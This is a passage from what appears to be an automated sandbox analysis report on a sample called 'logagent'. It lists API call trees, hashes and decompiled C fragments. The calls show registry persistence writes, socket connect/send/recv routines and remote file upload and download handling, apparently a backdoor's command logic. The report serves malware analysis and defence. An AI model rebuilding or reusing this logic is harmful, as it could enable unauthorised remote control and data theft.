                                    • Part of subcall function 0040309E: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(?,?,?,00000001,?,?,00000000,00408CAD,00000000), ref: 004030B4
                                    • Part of subcall function 0040309E: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?), ref: 004030C0
                                    • Part of subcall function 0040309E: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,00000000), ref: 004030D5
                                    • Part of subcall function 0040309E: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004030DE
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,00000000), ref: 0040B934
                                    • Part of subcall function 0040B708: RegCreateKeyA.ADVAPI32(?,?,?), ref: 0040B715
                                    • Part of subcall function 0040B708: ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(0041BCB0,00000000,?,0040B948,?,?,?,?,?,?,00000000), ref: 0040B724
                                    • Part of subcall function 0040B708: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,0040B948,?,?,?,?,?,?,00000000), ref: 0040B72E
                                    • Part of subcall function 0040B708: RegSetValueExA.KERNELBASE(?,0040B948,00000000,?,00000000,?,0040B948,?,?,?,?,?,?,00000000), ref: 0040B741
                                    • Part of subcall function 0040B708: RegCloseKey.ADVAPI32(?,?,0040B948,?,?,?,?,?,?,00000000), ref: 0040B74C
                                    • Part of subcall function 0040B708: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,0040B948,?,?,?,?,?,?,00000000), ref: 0040B75B
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040B950
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000003.00000002.532934609.000000000041D000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_logagent.jbxd
                                  Similarity
                                  • API ID: V?$allocator@$D@2@@std@@D@std@@U?$char_traits@$??0?$basic_string@??1?$basic_string@$?c_str@?$basic_string@V01@@$?size@?$basic_string@CloseCreateD@1@@Value
                                  • String ID:
                                  • API String ID: 4160275866-0
                                  • Opcode ID: 94e2c8fb91e0ed3f8a2486e32967f0b369ab0fbd2e3e4c85fbc94b61518e1a91
                                  • Instruction ID: a30d44c29fbcbd94969b178d1547bfdf4262e3352807cc03f3af364f17bb576d
                                  • Instruction Fuzzy Hash: C9F04F7280010EABCF01AFA5DC458EE7B79BB04208F004829F92522060E67695A4DB54
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,0041BE70,?,0040CF62,0000004B), ref: 004020D1
                                    • Part of subcall function 00402440: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(0041BE70,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 0040244A
                                    • Part of subcall function 00402440: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60([DataStart],00000013,?,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 00402463
                                    • Part of subcall function 00402440: ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP60(0000000B,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 0040246E
                                    • Part of subcall function 00402440: ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP60(0000000F,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 0040247B
                                    • Part of subcall function 00402440: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 0040248D
                                    • Part of subcall function 00402440: ?empty@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE_NXZ.MSVCP60(?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 00402498
                                    • Part of subcall function 00402440: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 004024A7
                                    • Part of subcall function 00402440: ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 004024B1
                                    • Part of subcall function 00402440: send.WS2_32(?,00000000), ref: 004024BB
                                    • Part of subcall function 00402440: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 00402512
                                    • Part of subcall function 00402440: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 0040251B
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004020E7
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000003.00000002.532934609.000000000041D000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_logagent.jbxd
                                  Similarity
                                  • API ID: V?$allocator@$D@2@@std@@D@std@@U?$char_traits@$??1?$basic_string@$??0?$basic_string@?length@?$basic_string@A?$basic_string@V01@@$?data@?$basic_string@?empty@?$basic_string@D@1@@V01@Y?$basic_string@send
                                  • String ID:
                                  • API String ID: 868658090-0
                                  • Opcode ID: d890864cfad681b016a33312849ab50d27a828bdf9536b28ad934c6231dadfcb
                                  • Instruction ID: d9a2345f5f1697b642a9e7ab7bc87c8d23e46c7080ea0e2ac139fbaf6b3ea179
                                  • Instruction Fuzzy Hash: 97D0123650011CBBCB007FE9EC098D97B68DB452A5740C465FE1587261EA729620D7D5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000003.00000002.532934609.000000000041D000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_logagent.jbxd
                                  Similarity
                                  • API ID: __dllonexit_onexit
                                  • String ID:
                                  • API String ID: 2384194067-0
                                  • Opcode ID: a0f76b705919cd2b1b3505feded0ad4b759bc61fe2e2080deee93d3e34803ae7
                                  • Instruction ID: 4ade6cbf426c929272142e716342c2a11d1dea90e179e11a85702f2ae3751f82
                                  • Instruction Fuzzy Hash: 55C01274CC4301FBCF102B60BC866C67711B7A1B32BA087AAF565110F0C77D49A4AA0D
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • RtlExitUserThread.NTDLL(00000000), ref: 00C00023
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.533321299.0000000000C00000.00000040.00000400.00020000.00000000.sdmp, Offset: 00C00000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_c00000_logagent.jbxd
                                  Similarity
                                  • API ID: ExitThreadUser
                                  • String ID:
                                  • API String ID: 3424019298-0
                                  • Opcode ID: 46ff59f967ff6d5f8062231f6615e391b4eae6b59b37df9d4a5e4cea238d21c4
                                  • Instruction ID: 31f55fc70ad1d22fff56d4cf632896c20d063e432f342e22e3eed41fb45fc377
                                  • Instruction Fuzzy Hash: 5EE0B676D00118ABCB109AE9DC088DFBB7DEF45221B000662B915F2110DB715A109AA1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • RtlExitUserThread.NTDLL(00000000), ref: 00970023
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.533142771.0000000000970000.00000040.00000400.00020000.00000000.sdmp, Offset: 00970000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_970000_logagent.jbxd
                                  Similarity
                                  • API ID: ExitThreadUser
                                  • String ID:
                                  • API String ID: 3424019298-0
                                  • Opcode ID: 46ff59f967ff6d5f8062231f6615e391b4eae6b59b37df9d4a5e4cea238d21c4
                                  • Instruction ID: 31f55fc70ad1d22fff56d4cf632896c20d063e432f342e22e3eed41fb45fc377
                                  • Instruction Fuzzy Hash: 5EE0B676D00118ABCB109AE9DC088DFBB7DEF45221B000662B915F2110DB715A109AA1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 80%
                                  			E00402038(intOrPtr* __ecx) {
                                  				intOrPtr _t6;
                                  				intOrPtr* _t9;
                                  
                                  				_t9 = __ecx;
                                  				if( *0x41b730 != 0) {
                                  					L2:
                                  					_push(6);
                                  					_push(1);
                                  					_push(0); // executed
                                  					L0041418E(); // executed
                                  					 *_t9 = _t6;
                                  					if(_t6 != 0xffffffff) {
                                  						 *(_t9 + 0x38) =  *(_t9 + 0x38) & 0x00000000;
                                  						 *(_t9 + 0x39) =  *(_t9 + 0x39) & 0x00000000;
                                  						 *((intOrPtr*)(_t9 + 0x34)) = 0x3e8;
                                  						return _t6;
                                  					} else {
                                  						goto L3;
                                  					}
                                  				} else {
                                  					_t6 = E00402074(); // executed
                                  					if(_t6 == 0) {
                                  						L3:
                                  						return 0;
                                  					} else {
                                  						goto L2;
                                  					}
                                  				}
                                  			}

                                  APIs
                                  • socket.WS2_32(00000000,00000001,00000006), ref: 00402053
                                    • Part of subcall function 00402074: WSAStartup.WS2_32(00000202,?), ref: 00402089
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000003.00000002.532934609.000000000041D000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_logagent.jbxd
                                  Similarity
                                  • API ID: Startupsocket
                                  • String ID:
                                  • API String ID: 3996037109-0
                                  • Opcode ID: a838745da6ed8195359329033db1b7584455c5d17c7e212a85de7325608f8976
                                  • Instruction ID: 9496cea1f1e3f543e84bf9b8819d2566c755aa2e8cb9b0b358b440cdad1f8944
                                  • Instruction Fuzzy Hash: 0FE026204487A121EFB02B20678D3C32BC11B02738F0016AEF280769D3C3FC1485C388
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 16%
                                  			E0040209B(intOrPtr* __ecx, void* _a4) {
                                  				signed int _t3;
                                  
                                  				_t1 = __ecx + 4; // 0x41be74
                                  				_t3 = _t1;
                                  				_push(0x10);
                                  				asm("movsd");
                                  				asm("movsd");
                                  				asm("movsd");
                                  				_push(_t3);
                                  				_push( *__ecx);
                                  				asm("movsd"); // executed
                                  				L0041419A(); // executed
                                  				asm("sbb al, al");
                                  				return  ~_t3 + 1;
                                  			}

                                  APIs
                                  • connect.WS2_32(0041BE70,0041BE74,00000010), ref: 004020B1
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000003.00000002.532934609.000000000041D000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_logagent.jbxd
                                  Similarity
                                  • API ID: connect
                                  • String ID:
                                  • API String ID: 1959786783-0
                                  • Opcode ID: 8f987cbbf3fb9e12a8f92e976e4f78da9b9bf78db8d1cc63ee0fa56af0114424
                                  • Instruction ID: 87562d7c3fa6cfb31469a52a797acd734afc423ba1c102534055d0d979432199
                                  • Instruction Fuzzy Hash: 15D0A73308052C7AC900DDA4EC02DF7375DDB83B60F104416FE018F052C293A59691D0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 53%
                                  			E00402074() {
                                  				char _v404;
                                  				signed int _t2;
                                  				char _t4;
                                  
                                  				_t2 =  &_v404;
                                  				_push(_t2);
                                  				_push(0x202); // executed
                                  				L00414194(); // executed
                                  				asm("sbb al, al");
                                  				_t4 =  ~_t2 + 1;
                                  				 *0x41b730 = _t4;
                                  				return _t4;
                                  			}

                                  APIs
                                  • WSAStartup.WS2_32(00000202,?), ref: 00402089
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000003.00000002.532934609.000000000041D000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_logagent.jbxd
                                  Similarity
                                  • API ID: Startup
                                  • String ID:
                                  • API String ID: 724789610-0
                                  • Opcode ID: 85389655ccf312e74c41d41a43fd4d1fbb1ccf973644e7ce17a1e4acb925192c
                                  • Instruction ID: aaec609cd6a5438bb82df53de8e824b0c91ee93dfa3372403453e0fac8186511
                                  • Instruction Fuzzy Hash: 4AC08C3149431C6DEA02A3B5990BBE5776CD35EB44F4002BAAA11830D7D384955D42B6
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000003.00000002.533187424.0000000000990000.00000040.00000400.00020000.00000000.sdmp, Offset: 00990000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_990000_logagent.jbxd
                                  Similarity
                                  • Opcode ID: a8f87fc558e2f538fd351bdfc49e2c6aa18e45c6a6d2c8ec1415aa36aaa266a9
                                  • Instruction ID: 18b5e61e04c7bcae5a7a9f8a09946595db22e2a0f492063f86ebefdf2a899b08
                                  • Instruction Fuzzy Hash: 33D01275914208EFDB04CF54D84589EBBF5EB44320F20C165E914973A0E731AE509A44
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 00403C60
                                  • SetEvent.KERNEL32(?), ref: 00403C69
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 00403C72
                                  • ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000004,6DF55DF0), ref: 00403C8A
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(0041B310), ref: 00403C9B
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 00403CAA
                                    • Part of subcall function 004129EB: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 004129FA
                                    • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A11
                                    • Part of subcall function 004129EB: ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIABV12@I@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5), ref: 00412A27
                                    • Part of subcall function 004129EB: ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000000,00000000), ref: 00412A45
                                    • Part of subcall function 004129EB: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A4F
                                    • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A58
                                    • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A6D
                                    • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A7A
                                    • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412ACC
                                    • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412AD5
                                    • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412ADE
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00000000), ref: 00403D11
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00000000), ref: 00403D27
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000), ref: 00403D5F
                                    • Part of subcall function 00403816: CreateFileW.KERNEL32(0000FDE8,80000000,00000000,00000000,00000003,00000080,00000000,?,0041B310,00000000), ref: 00403845
                                    • Part of subcall function 00403816: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 0040385C
                                    • Part of subcall function 00403816: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00403B9B
                                    • Part of subcall function 00403816: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00403BA4
                                    • Part of subcall function 00403816: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00403BAD
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(00000000), ref: 00403D7A
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,Uploaded file: ,00000000,?,00000000,?,00000000,00000000), ref: 00403DB1
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,00000000), ref: 00403DD6
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000004,?,?,?,?,?,?,?,00000000), ref: 00404199
                                  • atoi.MSVCRT ref: 004041A0
                                    • Part of subcall function 00403473: ??9std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(0041B300,00415664,[INFO],[DEBUG],00000000,?,004041B5,?,?,00000000), ref: 00403499
                                    • Part of subcall function 00403473: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,00000000,?,?,?,?,?,?,?,?,00000000), ref: 004034AC
                                    • Part of subcall function 00403473: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,00000000), ref: 004034B5
                                    • Part of subcall function 00403473: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,?,00000000,?,?,?,?,?,?,?,?,00000000), ref: 004034CE
                                    • Part of subcall function 00403473: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,00000000), ref: 004034DB
                                    • Part of subcall function 00403473: ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 004034F0
                                    • Part of subcall function 00403473: recv.WS2_32(00000000,?,0000FDE8,00000000), ref: 00403517
                                    • Part of subcall function 00403473: ?append@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@PBDI@Z.MSVCP60(?,00000000,00000000,?,0000FDE8,00000000), ref: 00403534
                                    • Part of subcall function 00403473: ?empty@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE_NXZ.MSVCP60 ref: 00403541
                                    • Part of subcall function 00403473: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?), ref: 00403556
                                    • Part of subcall function 00403473: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60(00415664), ref: 00403560
                                    • Part of subcall function 00403473: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(?,00000004,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00403578
                                  • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004041C3
                                    • Part of subcall function 00412718: _itoa.MSVCRT ref: 00412736
                                    • Part of subcall function 00412718: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,0040CC05,?,00000000,0041B310,00000000,0041B310,?), ref: 0041274A
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,Downloaded file size: ,00000000,?,?,?,00000000), ref: 004041E1
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([DEBUG],?,?,?,Downloaded file size: ,00000000,?,?,?,00000000), ref: 004041EE
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00404202
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000,00000000), ref: 00404223
                                  • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000000), ref: 0040422D
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 00404237
                                    • Part of subcall function 00412D56: CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,00000000,0041623C), ref: 00412D93
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040424C
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,Downloaded file: ,00000000,?,00000000,?,00000000,00000000), ref: 0040427E
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([INFO],?,?,?,Downloaded file: ,00000000,?,00000000,?,00000000,00000000), ref: 0040428B
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,00000000), ref: 0040429F
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,00000000), ref: 004042AB
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00415664,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004042C2
                                    • Part of subcall function 00402440: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(0041BE70,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 0040244A
                                    • Part of subcall function 00402440: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60([DataStart],00000013,?,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 00402463
                                    • Part of subcall function 00402440: ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP60(0000000B,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 0040246E
                                    • Part of subcall function 00402440: ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP60(0000000F,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 0040247B
                                    • Part of subcall function 00402440: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 0040248D
                                    • Part of subcall function 00402440: ?empty@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE_NXZ.MSVCP60(?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 00402498
                                    • Part of subcall function 00402440: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 004024A7
                                    • Part of subcall function 00402440: ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 004024B1
                                    • Part of subcall function 00402440: send.WS2_32(?,00000000), ref: 004024BB
                                    • Part of subcall function 00402440: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 00402512
                                    • Part of subcall function 00402440: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 0040251B
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,Failed to download file: ,00000000,?,00000000,?,00000000,00000000), ref: 00404300
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([ERROR],?,?,?,Failed to download file: ,00000000,?,00000000,?,00000000,00000000), ref: 00404311
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,00000000), ref: 00404325
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,00000000), ref: 00404331
                                  • closesocket.WS2_32(?), ref: 0040433A
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,?,00000000,?,00000000,00000001,00000000,00000000), ref: 004043F7
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,?,00000001,00000000,00000000), ref: 00404401
                                  • CreateDirectoryW.KERNEL32(00000000,?,?,00000001,00000000,00000000), ref: 00404408
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,00000001,00000000,00000000), ref: 00404414
